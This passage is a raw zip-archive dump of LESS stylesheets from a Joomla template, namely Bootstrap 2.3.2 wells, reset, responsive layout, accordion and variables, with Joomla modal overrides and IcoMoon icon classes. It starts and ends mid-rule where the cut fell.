					-moz-transform: translateX(-50%);
					-ms-transform: translateX(-50%);
					-o-transform: translateX(-50%);
					transform: translateX(-50%);
					right: auto;
					-webkit-transition: -webkit-transform 0.3s;
					-moz-transition: -moz-transform 0.3s;
					transition: transform 0.3s;
				}
				
				&:hover {
					&:before,
					&:after {
					  -webkit-transform: translateX(-50%) translateY(-50px);
					  -moz-transform: translateX(-50%) translateY(-50px);
					  -ms-transform: translateX(-50%) translateY(-50px);
					  -o-transform: translateX(-50%) translateY(-50px);
					  transform: translateX(-50%) translateY(-50px);
					}
				}
			}
		}
	}	
}
PK!l{nc((flex/less/legacy/wells.lessnu&1i�//
// Wells
// --------------------------------------------------


// Base class
.well {
  min-height: 20px;
  padding: 19px;
  margin-bottom: 20px;
  background-color: @wellBackground;
  border: 1px solid darken(@wellBackground, 7%);
  .border-radius(@baseBorderRadius);
  .box-shadow(inset 0 1px 1px rgba(0,0,0,.05));
  blockquote {
    border-color: #ddd;
    border-color: rgba(0,0,0,.15);
  }
}

// Sizes
.well-large {
  padding: 24px;
  .border-radius(@borderRadiusLarge);
}
.well-small {
  padding: 9px;
  .border-radius(@borderRadiusSmall);
}
PK!=��xxflex/less/legacy/reset.lessnu&1i�//
// Reset CSS
// Adapted from http://github.com/necolas/normalize.css
// --------------------------------------------------


// Display in IE6-9 and FF3
// -------------------------

article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
nav,
section {
  display: block;
}

// Display block in IE6-9 and FF3
// -------------------------

audio,
canvas,
video {
  display: inline-block;
  *display: inline;
  *zoom: 1;
}

// Prevents modern browsers from displaying 'audio' without controls
// -------------------------

audio:not([controls]) {
    display: none;
}

// Base settings
// -------------------------

html {
  font-size: 100%;
  -webkit-text-size-adjust: 100%;
      -ms-text-size-adjust: 100%;
}
// Focus states
a:focus {
  .tab-focus();
}
// Hover & Active
a:hover,
a:active {
  outline: 0;
}

// Prevents sub and sup affecting line-height in all browsers
// -------------------------

sub,
sup {
  position: relative;
  font-size: 75%;
  line-height: 0;
  vertical-align: baseline;
}
sup {
  top: -0.5em;
}
sub {
  bottom: -0.25em;
}

// Img border in a's and image quality
// -------------------------

img {
  /* Responsive images (ensure images don't scale beyond their parents) */
  max-width: 100%; /* Part 1: Set a maxium relative to the parent */
  width: auto\9; /* IE7-8 need help adjusting responsive images */
  height: auto; /* Part 2: Scale the height according to the width, otherwise you get stretching */

  vertical-align: middle;
  border: 0;
  -ms-interpolation-mode: bicubic;
}

// Prevent max-width from affecting Google Maps
#map_canvas img,
.google-maps img,
.gm-style img {
  max-width: none;
}

// Forms
// -------------------------

// Font size in all browsers, margin changes, misc consistency
button,
input,
select,
textarea {
  margin: 0;
  font-size: 100%;
  vertical-align: middle;
}
button,
input {
  *overflow: visible; // Inner spacing ie IE6/7
  line-height: normal; // FF3/4 have !important on line-height in UA stylesheet
}
button::-moz-focus-inner,
input::-moz-focus-inner { // Inner padding and border oddities in FF3/4
  padding: 0;
  border: 0;
}
button,
html input[type="button"], // Avoid the WebKit bug in Android 4.0.* where (2) destroys native `audio` and `video` controls.
input[type="reset"],
input[type="submit"] {
    -webkit-appearance: button; // Corrects inability to style clickable `input` types in iOS.
    cursor: pointer; // Improves usability and consistency of cursor style between image-type `input` and others.
}
label,
select,
button,
input[type="button"],
input[type="reset"],
input[type="submit"],
input[type="radio"],
input[type="checkbox"] {
    cursor: pointer; // Improves usability and consistency of cursor style between image-type `input` and others.
}
input[type="search"] { // Appearance in Safari/Chrome
  .box-sizing(content-box);
  -webkit-appearance: textfield;
}
input[type="search"]::-webkit-search-decoration,
input[type="search"]::-webkit-search-cancel-button {
  -webkit-appearance: none; // Inner-padding issues in Chrome OSX, Safari 5
}
textarea {
  overflow: auto; // Remove vertical scrollbar in IE6-9
  vertical-align: top; // Readability and alignment cross-browser
}


// Printing
// -------------------------
// Source: https://github.com/h5bp/html5-boilerplate/blob/master/css/main.css

@media print {

  * {
    text-shadow: none !important;
    color: #000 !important; // Black prints faster: h5bp.com/s
    background: transparent !important;
    box-shadow: none !important;
  }

  a,
  a:visited {
    text-decoration: underline;
  }

  a[href]:after {
    content: " (" attr(href) ")";
  }

  abbr[title]:after {
    content: " (" attr(title) ")";
  }

  // Don't show links for images, or javascript/internal links
  .ir a:after,
  a[href^="javascript:"]:after,
  a[href^="#"]:after {
    content: "";
  }

  pre,
  blockquote {
    border: 1px solid #999;
    page-break-inside: avoid;
  }

  thead {
    display: table-header-group; // h5bp.com/t
  }

  tr,
  img {
    page-break-inside: avoid;
  }

  img {
    max-width: 100% !important;
  }

  @page {
    margin: 0.5cm;
  }

  p,
  h2,
  h3 {
    orphans: 3;
    widows: 3;
  }

  h2,
  h3 {
    page-break-after: avoid;
  }
}
PK!It���*flex/less/legacy/responsive-767px-max.lessnu&1i�//
// Responsive: Landscape phone to desktop/tablet
// --------------------------------------------------


@media (max-width: 767px) {

  // Padding to set content in a bit
  body {
    padding-left: 20px;
    padding-right: 20px;
  }
  // Negative indent the now static "fixed" navbar
  .navbar-fixed-top,
  .navbar-fixed-bottom,
  .navbar-static-top {
    margin-left: -20px;
    margin-right: -20px;
  }
  // Remove padding on container given explicit padding set on body
  .container-fluid {
    padding: 0;
  }

  // TYPOGRAPHY
  // ----------
  // Reset horizontal dl
  .dl-horizontal {
    dt {
      float: none;
      clear: none;
      width: auto;
      text-align: left;
    }
    dd {
      margin-left: 0;
    }
  }

  // GRID & CONTAINERS
  // -----------------
  // Remove width from containers
  .container {
    width: auto;
  }
  // Fluid rows
  .row-fluid {
    width: 100%;
  }
  // Undo negative margin on rows and thumbnails
  .row,
  .thumbnails {
    margin-left: 0;
  }
  .thumbnails > li {
    float: none;
    margin-left: 0; // Reset the default margin for all li elements when no .span* classes are present
  }
  // Make all grid-sized elements block level again
  [class*="span"],
  .uneditable-input[class*="span"], // Makes uneditable inputs full-width when using grid sizing
  .row-fluid [class*="span"] {
    float: none;
    display: block;
    width: 100%;
    margin-left: 0;
    .box-sizing(border-box);
  }
  .span12,
  .row-fluid .span12 {
    width: 100%;
    .box-sizing(border-box);
  }
  .row-fluid [class*="offset"]:first-child {
    margin-left: 0;
  }

  // FORM FIELDS
  // -----------
  // Make span* classes full width
  .input-large,
  .input-xlarge,
  .input-xxlarge,
  input[class*="span"],
  select[class*="span"],
  textarea[class*="span"],
  .uneditable-input {
    .input-block-level();
  }
  // But don't let it screw up prepend/append inputs
  .input-prepend input,
  .input-append input,
  .input-prepend input[class*="span"],
  .input-append input[class*="span"] {
    display: inline-block; // redeclare so they don't wrap to new lines
    width: auto;
  }
  .controls-row [class*="span"] + [class*="span"] {
    margin-left: 0;
  }

  // Modals
// /* >>> JUI >>> */
// .modal REMOVED
// /* <<< JUI <<< */

}



// UP TO LANDSCAPE PHONE
// ---------------------

@media (max-width: 480px) {

  // Smooth out the collapsing/expanding nav
  .nav-collapse {
    -webkit-transform: translate3d(0, 0, 0); // activate the GPU
  }

  // Block level the page header small tag for readability
  .page-header h1 small {
    display: block;
    line-height: @baseLineHeight;
  }

  // Update checkboxes for iOS
  input[type="checkbox"],
  input[type="radio"] {
    border: 1px solid #ccc;
  }

  // Remove the horizontal form styles
  .form-horizontal {
    .control-label {
      float: none;
      width: auto;
      padding-top: 0;
      text-align: left;
    }
    // Move over all input controls and content
    .controls {
      margin-left: 0;
    }
    // Move the options list down to align with labels
    .control-list {
      padding-top: 0; // has to be padding because margin collaspes
    }
    // Move over buttons in .form-actions to align with .controls
    .form-actions {
      padding-left: 10px;
      padding-right: 10px;
    }
  }

  // Medias
  // Reset float and spacing to stack
  .media .pull-left,
  .media .pull-right  {
    float: none;
    display: block;
    margin-bottom: 10px;
  }
  // Remove side margins since we stack instead of indent
  .media-object {
    margin-right: 0;
    margin-left: 0;
  }

  // Modals
// > Joomla JUI
// .modal REMOVED
// < Joomla JUI

  .modal-header .close {
    padding: 10px;
    margin: -10px;
  }

  // Carousel
  .carousel-caption {
    position: static;
  }

}
PK!���``flex/less/legacy/bootstrap.lessnu&1i�/*!
 * Bootstrap v2.3.2
 *
 * Copyright 2012 Twitter, Inc
 * Licensed under the Apache License v2.0
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Designed and built with all the love in the world @twitter by @mdo and @fat.
 */

// Core variables and mixins
@import "variables.less"; // Modify this for custom colors, font-sizes, etc
@import "mixins.less";

// Grid system and page structure
@import "grid.less";

// Base CSS
@import "forms.less";

// Components: common
@import "wells.less";

// Components: common
@import "accordion.less";

@import "responsive-767px-max.joomla.less";
// < Joomla JUI
PK!���r-- flex/less/legacy/responsive.lessnu&1i�/*!
 * Bootstrap Responsive v2.3.2
 *
 * Copyright 2012 Twitter, Inc
 * Licensed under the Apache License v2.0
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Designed and built with all the love in the world @twitter by @mdo and @fat.
 */


// Responsive.less
// For phone and tablet devices
// -------------------------------------------------------------


// REPEAT VARIABLES & MIXINS
// -------------------------
// Required since we compile the responsive stuff separately

@import "variables.less"; // Modify this for custom colors, font-sizes, etc
@import "mixins.less";


// RESPONSIVE CLASSES
// ------------------

@import "responsive-utilities.less";


// MEDIA QUERIES
// ------------------

// Large desktops
@import "responsive-1200px-min.less";

// Tablets to regular desktops
@import "responsive-768px-979px.less";

// Phones to portrait tablets and narrow desktops
@import "responsive-767px-max.less";


// RESPONSIVE NAVBAR
// ------------------

// From 979px and below, show a button to toggle navbar contents
@import "responsive-navbar.less";
PK!���||flex/less/legacy/accordion.lessnu&1i�//
// Accordion
// --------------------------------------------------


// Parent container
.accordion {
  margin-bottom: @baseLineHeight;
}

// Group == heading + body
.accordion-group {
  margin-bottom: 2px;
  border: 1px solid #e5e5e5;
  .border-radius(@baseBorderRadius);
}
.accordion-heading {
  border-bottom: 0;
}
.accordion-heading .accordion-toggle {
  display: block;
  padding: 8px 15px;
}

// General toggle styles
.accordion-toggle {
  cursor: pointer;
}

// Inner needs the styles because you can't animate properly with any styles on the element
.accordion-inner {
  padding: 9px 15px;
  border-top: 1px solid #e5e5e5;
}
PK!��55+flex/less/legacy/responsive-1200px-min.lessnu&1i�//
// Responsive: Large desktop and up
// --------------------------------------------------


@media (min-width: 1200px) {

  // Fixed grid
  #grid > .core(@gridColumnWidth1200, @gridGutterWidth1200);

  // Fluid grid
  #grid > .fluid(@fluidGridColumnWidth1200, @fluidGridGutterWidth1200);

  // Input grid
  #grid > .input(@gridColumnWidth1200, @gridGutterWidth1200);

  // Thumbnails
  .thumbnails {
    margin-left: -@gridGutterWidth1200;
  }
  .thumbnails > li {
    margin-left: @gridGutterWidth1200;
  }
  .row-fluid .thumbnails {
    margin-left: 0;
  }

}
PK!F�CUYY1flex/less/legacy/responsive-767px-max.joomla.lessnu&1i�//
// Responsive: Landscape phone to desktop/tablet
// --------------------------------------------------

/* Joomla JUI NOTE: Original .modal definition has to be commented */

// > Joomla JUI
@media (max-width: 767px) {
  
  // Modals
  div.modal {
    position: fixed;
    top:   20px;
    left:  20px;
    right: 20px;
    width: auto;
    margin: 0;
    &.fade  { top: -100px; }
    &.fade.in { top: 20px; }
  }

}

// UP TO LANDSCAPE PHONE
// ---------------------

@media (max-width: 480px) {

  // Modals
  div.modal {
    top:   10px;
    left:  10px;
    right: 10px;
  }

}
// < Joomla JUI
PK!��u�#�#flex/less/legacy/variables.lessnu&1i�//
// Variables
// --------------------------------------------------


// Global values
// --------------------------------------------------


// Grays
// -------------------------
@black:                 #000;
@grayDarker:            #222;
@grayDark:              #333;
@gray:                  #555;
@grayLight:             #999;
@grayLighter:           #eee;
@white:                 #fff;


// Accent colors
// -------------------------
@blue:                  #049cdb;
@blueDark:              #0064cd;
@green:                 #46a546;
@red:                   #9d261d;
@yellow:                #ffc40d;
@orange:                #f89406;
@pink:                  #c3325f;
@purple:                #7a43b6;


// Scaffolding
// -------------------------
@bodyBackground:        @white;
@textColor:             @grayDark;


// Links
// -------------------------
@linkColor:             #08c;
@linkColorHover:        darken(@linkColor, 15%);


// Typography
// -------------------------
@sansFontFamily:        "Helvetica Neue", Helvetica, Arial, sans-serif;
@serifFontFamily:       Georgia, "Times New Roman", Times, serif;
@monoFontFamily:        Monaco, Menlo, Consolas, "Courier New", monospace;

@baseFontSize:          14px;
@baseFontFamily:        @sansFontFamily;
@baseLineHeight:        20px;
@altFontFamily:         @serifFontFamily;

@headingsFontFamily:    inherit; // empty to use BS default, @baseFontFamily
@headingsFontWeight:    bold;    // instead of browser default, bold
@headingsColor:         inherit; // empty to use BS default, @textColor


// Component sizing
// -------------------------
// Based on 14px font-size and 20px line-height

@fontSizeLarge:         @baseFontSize * 1.25; // ~18px
@fontSizeSmall:         @baseFontSize * 0.85; // ~12px
@fontSizeMini:          @baseFontSize * 0.75; // ~11px

@paddingLarge:          11px 19px; // 44px
@paddingSmall:          2px 10px;  // 26px
@paddingMini:           0 6px;   // 22px

@baseBorderRadius:      4px;
@borderRadiusLarge:     6px;
@borderRadiusSmall:     3px;


// Tables
// -------------------------
@tableBackground:                   transparent; // overall background-color
@tableBackgroundAccent:             #f9f9f9; // for striping
@tableBackgroundHover:              #f5f5f5; // for hover
@tableBorder:                       #ddd; // table and cell border

// Buttons
// -------------------------
@btnBackground:                     @white;
@btnBackgroundHighlight:            darken(@white, 10%);
@btnBorder:                         #ccc;

@btnPrimaryBackground:              @linkColor;
@btnPrimaryBackgroundHighlight:     spin(@btnPrimaryBackground, 20%);

@btnInfoBackground:                 #5bc0de;
@btnInfoBackgroundHighlight:        #2f96b4;

@btnSuccessBackground:              #62c462;
@btnSuccessBackgroundHighlight:     #51a351;

@btnWarningBackground:              lighten(@orange, 15%);
@btnWarningBackgroundHighlight:     @orange;

@btnDangerBackground:               #ee5f5b;
@btnDangerBackgroundHighlight:      #bd362f;

@btnInverseBackground:              #444;
@btnInverseBackgroundHighlight:     @grayDarker;


// Forms
// -------------------------
@inputBackground:               @white;
@inputBorder:                   #ccc;
@inputBorderRadius:             @baseBorderRadius;
@inputDisabledBackground:       @grayLighter;
@formActionsBackground:         #f5f5f5;
@inputHeight:                   @baseLineHeight + 10px; // base line-height + 8px vertical padding + 2px top/bottom border


// Dropdowns
// -------------------------
@dropdownBackground:            @white;
@dropdownBorder:                rgba(0,0,0,.2);
@dropdownDividerTop:            #e5e5e5;
@dropdownDividerBottom:         @white;

@dropdownLinkColor:             @grayDark;
@dropdownLinkColorHover:        @white;
@dropdownLinkColorActive:       @white;

@dropdownLinkBackgroundActive:  @linkColor;
@dropdownLinkBackgroundHover:   @dropdownLinkBackgroundActive;



// COMPONENT VARIABLES
// --------------------------------------------------


// Z-index master list
// -------------------------
// Used for a bird's eye view of components dependent on the z-axis
// Try to avoid customizing these :)
@zindexDropdown:          1000;
@zindexPopover:           1010;
@zindexTooltip:           1030;
@zindexFixedNavbar:       1030;
@zindexModalBackdrop:     1040;
@zindexModal:             1050;


// Sprite icons path
// -------------------------
@iconSpritePath:          "../img/glyphicons-halflings.png";
@iconWhiteSpritePath:     "../img/glyphicons-halflings-white.png";


// Input placeholder text color
// -------------------------
@placeholderText:         @grayLight;


// Hr border color
// -------------------------
@hrBorder:                @grayLighter;


// Horizontal forms & lists
// -------------------------
@horizontalComponentOffset:       180px;


// Wells
// -------------------------
@wellBackground:                  #f5f5f5;


// Navbar
// -------------------------
@navbarCollapseWidth:             979px;
@navbarCollapseDesktopWidth:      @navbarCollapseWidth + 1;

@navbarHeight:                    40px;
@navbarBackgroundHighlight:       #ffffff;
@navbarBackground:                darken(@navbarBackgroundHighlight, 5%);
@navbarBorder:                    darken(@navbarBackground, 12%);

@navbarText:                      #777;
@navbarLinkColor:                 #777;
@navbarLinkColorHover:            @grayDark;
@navbarLinkColorActive:           @gray;
@navbarLinkBackgroundHover:       transparent;
@navbarLinkBackgroundActive:      darken(@navbarBackground, 5%);

@navbarBrandColor:                @navbarLinkColor;

// Inverted navbar
@navbarInverseBackground:                #111111;
@navbarInverseBackgroundHighlight:       #222222;
@navbarInverseBorder:                    #252525;

@navbarInverseText:                      @grayLight;
@navbarInverseLinkColor:                 @grayLight;
@navbarInverseLinkColorHover:            @white;
@navbarInverseLinkColorActive:           @navbarInverseLinkColorHover;
@navbarInverseLinkBackgroundHover:       transparent;
@navbarInverseLinkBackgroundActive:      @navbarInverseBackground;

@navbarInverseSearchBackground:          lighten(@navbarInverseBackground, 25%);
@navbarInverseSearchBackgroundFocus:     @white;
@navbarInverseSearchBorder:              @navbarInverseBackground;
@navbarInverseSearchPlaceholderColor:    #ccc;

@navbarInverseBrandColor:                @navbarInverseLinkColor;


// Pagination
// -------------------------
@paginationBackground:                #fff;
@paginationBorder:                    #ddd;
@paginationActiveBackground:          #f5f5f5;


// Hero unit
// -------------------------
@heroUnitBackground:              @grayLighter;
@heroUnitHeadingColor:            inherit;
@heroUnitLeadColor:               inherit;


// Form states and alerts
// -------------------------
@warningText:             #c09853;
@warningBackground:       #fcf8e3;
@warningBorder:           darken(spin(@warningBackground, -10), 3%);

@errorText:               #b94a48;
@errorBackground:         #f2dede;
@errorBorder:             darken(spin(@errorBackground, -10), 3%);

@successText:             #468847;
@successBackground:       #dff0d8;
@successBorder:           darken(spin(@successBackground, -10), 5%);

@infoText:                #3a87ad;
@infoBackground:          #d9edf7;
@infoBorder:              darken(spin(@infoBackground, -10), 7%);


// Tooltips and popovers
// -------------------------
@tooltipColor:            #fff;
@tooltipBackground:       #000;
@tooltipArrowWidth:       5px;
@tooltipArrowColor:       @tooltipBackground;

@popoverBackground:       #fff;
@popoverArrowWidth:       10px;
@popoverArrowColor:       #fff;
@popoverTitleBackground:  darken(@popoverBackground, 3%);

// Special enhancement for popovers
@popoverArrowOuterWidth:  @popoverArrowWidth + 1;
@popoverArrowOuterColor:  rgba(0,0,0,.25);



// GRID
// --------------------------------------------------


// Default 940px grid
// -------------------------
@gridColumns:             12;
@gridColumnWidth:         60px;
@gridGutterWidth:         20px;
@gridRowWidth:            (@gridColumns * @gridColumnWidth) + (@gridGutterWidth * (@gridColumns - 1));

// 1200px min
@gridColumnWidth1200:     70px;
@gridGutterWidth1200:     30px;
@gridRowWidth1200:        (@gridColumns * @gridColumnWidth1200) + (@gridGutterWidth1200 * (@gridColumns - 1));

// 768px-979px
@gridColumnWidth768:      42px;
@gridGutterWidth768:      20px;
@gridRowWidth768:         (@gridColumns * @gridColumnWidth768) + (@gridGutterWidth768 * (@gridColumns - 1));


// Fluid grid
// -------------------------
@fluidGridColumnWidth:    percentage(@gridColumnWidth/@gridRowWidth);
@fluidGridGutterWidth:    percentage(@gridGutterWidth/@gridRowWidth);

// 1200px min
@fluidGridColumnWidth1200:     percentage(@gridColumnWidth1200/@gridRowWidth1200);
@fluidGridGutterWidth1200:     percentage(@gridGutterWidth1200/@gridRowWidth1200);

// 768px-979px
@fluidGridColumnWidth768:      percentage(@gridColumnWidth768/@gridRowWidth768);
@fluidGridGutterWidth768:      percentage(@gridGutterWidth768/@gridRowWidth768);
PK!�/n�0�0flex/less/legacy/icomoon.lessnu&1i�/*
 * Due to a bug in the compiler that doesn't handle the relative paths correctly, the @font-face stuff needs to go in the templates less files
@font-face {
	font-family: 'IcoMoon';
	src: url('../fonts/IcoMoon.eot');
	src: url('../fonts/IcoMoon.eot?#iefix') format('embedded-opentype'),
		url('../fonts/IcoMoon.woff') format('woff'),
		url('../fonts/IcoMoon.ttf') format('truetype'),
		url('../fonts/IcoMoon.svg#IcoMoon') format('svg');
	font-weight: normal;
	font-style: normal;
}
*/

/* Use the following CSS code if you want to use data attributes for inserting your icons */
[data-icon]:before {
	font-family: 'IcoMoon';
	content: attr(data-icon);
	speak: none;
}

/* From Bootstrap */
[class^="icon-"],
[class*=" icon-"] {
	display: inline-block;
	width: 14px;
	height: 14px;
	margin-right: .25em;
	line-height: 14px;
}

dd > span[class^="icon-"] + time,
dd > span[class*=" icon-"] + time{
	margin-left: -.25em;
}
dl.article-info dd.hits span[class^="icon-"],
dl.article-info dd.hits span[class*=" icon-"]{
	margin-right: 0;
 }
 
/* Use the following CSS code if you want to have a class per icon */
[class^="icon-"]:before, [class*=" icon-"]:before {
	font-family: 'IcoMoon';
	font-style: normal;
	speak: none;
}
[class^="icon-"].disabled,
[class*=" icon-"].disabled {
	font-weight: normal;
}

.icon-joomla:before {
	content: "\e200";
}
.icon-chevron-up:before,
.icon-uparrow:before,
.icon-arrow-up:before {
	content: "\e005";
}
.icon-chevron-right:before,
.icon-rightarrow:before,
.icon-arrow-right:before{
	content: "\e006";
}
.icon-chevron-down:before,
.icon-downarrow:before,
.icon-arrow-down:before {
	content: "\e007";
}
.icon-chevron-left:before,
.icon-leftarrow:before,
.icon-arrow-left:before {
	content: "\e008";
}
.icon-arrow-first:before {
	content: "\e003";
}
.icon-arrow-last:before {
	content: "\e004";
}
.icon-arrow-up-2:before {
	content: "\e009";
}
.icon-arrow-right-2:before {
	content: "\e00a";
}
.icon-arrow-down-2:before {
	content: "\e00b";
}
.icon-arrow-left-2:before {
	content: "\e00c";
}
.icon-arrow-up-3:before {
	content: "\e00f";
}
.icon-arrow-right-3:before {
	content: "\e010";
}
.icon-arrow-down-3:before {
	content: "\e011";
}
.icon-arrow-left-3:before {
	content: "\e012";
}
.icon-menu-2:before {
	content: "\e00e";
}
.icon-arrow-up-4:before {
	content: "\e201";
}
.icon-arrow-right-4:before {
	content: "\e202";
}
.icon-arrow-down-4:before {
	content: "\e203";
}
.icon-arrow-left-4:before {
	content: "\e204";
}
.icon-share:before,
.icon-redo:before {
	content: "\27";
}
.icon-undo:before {
	content: "\28";
}
.icon-forward-2:before {
	content: "\e205";
}
.icon-backward-2:before,
.icon-reply:before {
	content: "\e206";
}
.icon-unblock:before,
.icon-refresh:before,
.icon-redo-2:before {
	content: "\6c";
}
.icon-undo-2:before {
	content: "\e207";
}
.icon-move:before {
	content: "\7a";
}
.icon-expand:before {
	content: "\66";
}
.icon-contract:before {
	content: "\67";
}
.icon-expand-2:before {
	content: "\68";
}
.icon-contract-2:before {
	content: "\69";
}
.icon-play:before {
	content: "\e208";
}
.icon-pause:before {
	content: "\e209";
}
.icon-stop:before {
	content: "\e210";
}
.icon-previous:before,
.icon-backward:before {
	content: "\7c";
}
.icon-next:before,
.icon-forward:before {
	content: "\7b";
}
.icon-first:before {
	content: "\7d";
}
.icon-last:before {
	content: "\e000";
}
.icon-play-circle:before {
	content: "\e00d";
}
.icon-pause-circle:before {
	content: "\e211";
}
.icon-stop-circle:before {
	content: "\e212";
}
.icon-backward-circle:before {
	content: "\e213";
}
.icon-forward-circle:before {
	content: "\e214";
}
.icon-loop:before {
	content: "\e001";
}
.icon-shuffle:before {
	content: "\e002";
}
.icon-search:before {
	content: "\53";
}
.icon-zoom-in:before {
	content: "\64";
}
.icon-zoom-out:before {
	content: "\65";
}
.icon-apply:before,
.icon-edit:before,
.icon-pencil:before {
	content: "\2b";
}
.icon-pencil-2:before {
	content: "\2c";
}
.icon-brush:before {
	content: "\3b";
}
.icon-save-new:before,
.icon-plus-2:before  {
	content: "\5d";
}
.icon-ban-circle:before,
.icon-minus-sign:before,
.icon-minus-2:before {
	content: "\5e";
}
.icon-delete:before,
.icon-remove:before,
.icon-cancel-2:before {
	content: "\49";
}
.icon-publish:before,
.icon-save:before,
.icon-ok:before,
.icon-checkmark:before {
	content: "\47";
}
.icon-new:before,
.icon-plus:before {
	content: "\2a";
}
.icon-plus-circle:before {
	content: "\e215";
}
.icon-minus:before,
.icon-not-ok:before {
	content: "\4b";
}
.icon-minus-circle:before {
	content: "\e216";
}
.icon-unpublish:before,
.icon-cancel:before {
	content: "\4a";
}
.icon-cancel-circle:before {
	content: "\e217";
}
.icon-checkmark-2:before {
	content: "\e218";
}
.icon-checkmark-circle:before {
	content: "\e219";
}
.icon-info:before {
	content: "\e220";
}
.icon-info-2:before,
.icon-info-circle:before {
	content: "\e221";
}
.icon-question:before,
.icon-question-sign:before,
.icon-help:before {
	content: "\45";
}
.icon-question-2:before,
.icon-question-circle:before {
	content: "\e222";
}
.icon-notification:before {
	content: "\e223";
}
.icon-notification-2:before,
.icon-notification-circle:before {
	content: "\e224";
}
.icon-pending:before,
.icon-warning:before {
	content: "\48";
}
.icon-warning-2:before,
.icon-warning-circle:before {
	content: "\e225";
}
.icon-checkbox-unchecked:before {
	content: "\3d";
}
.icon-checkin:before,
.icon-checkbox:before,
.icon-checkbox-checked:before {
	content: "\3e";
}
.icon-checkbox-partial:before {
	content: "\3f";
}
.icon-square:before {
	content: "\e226";
}
.icon-radio-unchecked:before {
	content: "\e227";
}
.icon-radio-checked:before,
.icon-generic:before {
	content: "\e228";
}
.icon-circle:before {
	content: "\e229";
}
.icon-signup:before {
	content: "\e230";
}
.icon-grid:before,
.icon-grid-view:before {
	content: "\58";
}
.icon-grid-2:before,
.icon-grid-view-2:before {
	content: "\59";
}
.icon-menu:before {
	content: "\5a";
}
.icon-list:before,
.icon-list-view:before {
	content: "\31";
}
.icon-list-2:before {
	content: "\e231";
}
.icon-menu-3:before {
	content: "\e232";
}
.icon-folder-open:before,
.icon-folder:before {
	content: "\2d";
}
.icon-folder-close:before,
.icon-folder-2:before {
	content: "\2e";
}
.icon-folder-plus:before {
	content: "\e234";
}
.icon-folder-minus:before {
	content: "\e235";
}
.icon-folder-3:before {
	content: "\e236";
}
.icon-folder-plus-2:before {
	content: "\e237";
}
.icon-folder-remove:before {
	content: "\e238";
}
.icon-file:before {
	content: "\e016";
}
.icon-file-2:before {
	content: "\e239";
}
.icon-file-add:before,
.icon-file-plus:before {
	content: "\29";
}
.icon-file-remove:before,
.icon-file-minus:before {
	content: "\e017";
}
.icon-file-check:before {
	content: "\e240";
}
.icon-file-remove:before {
	content: "\e241";
}
.icon-save-copy:before,
.icon-copy:before {
	content: "\e018";
}
.icon-stack:before {
	content: "\e242";
}
.icon-tree:before {
	content: "\e243";
}
.icon-tree-2:before {
	content: "\e244";
}
.icon-paragraph-left:before {
	content: "\e246";
}
.icon-paragraph-center:before {
	content: "\e247";
}
.icon-paragraph-right:before {
	content: "\e248";
}
.icon-paragraph-justify:before {
	content: "\e249";
}
.icon-screen:before {
	content: "\e01c";
}
.icon-tablet:before {
	content: "\e01d";
}
.icon-mobile:before {
	content: "\e01e";
}
.icon-box-add:before {
	content: "\51";
}
.icon-box-remove:before {
	content: "\52";
}
.icon-download:before {
	content: "\e021";
}
.icon-upload:before {
	content: "\e022";
}
.icon-home:before {
	content: "\21";
}
.icon-home-2:before {
	content: "\e250";
}
.icon-out-2:before,
.icon-new-tab:before {
	content: "\e024";
}
.icon-out-3:before,
.icon-new-tab-2:before {
	content: "\e251";
}
.icon-link:before {
	content: "\e252";
}
.icon-picture:before,
.icon-image:before {
	content: "\2f";
}
.icon-pictures:before,
.icon-images:before {
	content: "\30";
}
.icon-palette:before,
.icon-color-palette:before {
	content: "\e014";
}
.icon-camera:before {
	content: "\55";
}
.icon-camera-2:before,
.icon-video:before {
	content: "\e015";
}
.icon-play-2:before,
.icon-video-2:before,
.icon-youtube:before {
	content: "\56";
}
.icon-music:before {
	content: "\57";
}
.icon-user:before {
	content: "\22";
}
.icon-users:before {
	content: "\e01f";
}
.icon-vcard:before {
	content: "\6d";
}
.icon-address:before {
	content: "\70";
}
.icon-share-alt:before,
.icon-out:before {
	content: "\26";
}
.icon-enter:before {
	content: "\e257";
}
.icon-exit:before {
	content: "\e258";
}
.icon-comment:before,
.icon-comments:before {
	content: "\24";
}
.icon-comments-2:before {
	content: "\25";
}
.icon-quote:before,
.icon-quotes-left:before {
	content: "\60";
}
.icon-quote-2:before,
.icon-quotes-right:before {
	content: "\61";
}
.icon-quote-3:before,
.icon-bubble-quote:before {
	content: "\e259";
}
.icon-phone:before {
	content: "\e260";
}
.icon-phone-2:before {
	content: "\e261";
}
.icon-envelope:before,
.icon-mail:before {
	content: "\4d";
}
.icon-envelope-opened:before,
.icon-mail-2:before {
	content: "\4e";
}
.icon-unarchive:before,
.icon-drawer:before {
	content: "\4f";
}
.icon-archive:before,
.icon-drawer-2:before {
	content: "\50";
}
.icon-briefcase:before {
	content: "\e020";
}
.icon-tag:before {
	content: "\e262";
}
.icon-tag-2:before {
	content: "\e263";
}
.icon-tags:before {
	content: "\e264";
}
.icon-tags-2:before {
	content: "\e265";
}
.icon-options:before,
.icon-cog:before {
	content: "\38";
}
.icon-cogs:before {
	content: "\37";
}
.icon-screwdriver:before,
.icon-tools:before {
	content: "\36";
}
.icon-wrench:before {
	content: "\3a";
}
.icon-equalizer:before {
	content: "\39";
}
.icon-dashboard:before {
	content: "\78";
}
.icon-switch:before {
	content: "\e266";
}
.icon-filter:before {
	content: "\54";
}
.icon-purge:before,
.icon-trash:before {
	content: "\4c";
}
.icon-checkedout:before,
.icon-lock:before,
.icon-locked:before {
	content: "\23";
}
.icon-unlock:before {
	content: "\e267";
}
.icon-key:before {
	content: "\5f";
}
.icon-support:before {
	content: "\46";
}
.icon-database:before {
	content: "\62";
}
.icon-scissors:before {
	content: "\e268";
}
.icon-health:before {
	content: "\6a";
}
.icon-wand:before {
	content: "\6b";
}
.icon-eye-open:before,
.icon-eye:before {
	content: "\3c";
}
.icon-eye-close:before,
.icon-eye-blocked:before,
.icon-eye-2:before {
	content: "\e269";
}
.icon-clock:before {
	content: "\6e";
}
.icon-compass:before {
	content: "\6f";
}
.icon-broadcast:before,
.icon-connection:before,
.icon-wifi:before {
	content: "\e01b";
}
.icon-book:before {
	content: "\e271";
}
.icon-lightning:before,
.icon-flash:before {
	content: "\79";
}
.icon-print:before,
.icon-printer:before {
	content: "\e013";
}
.icon-feed:before {
	content: "\71";
}
.icon-calendar:before {
	content: "\43";
}
.icon-calendar-2:before {
	content: "\44";
}
.icon-calendar-3:before {
	content: "\e273";
}
.icon-pie:before {
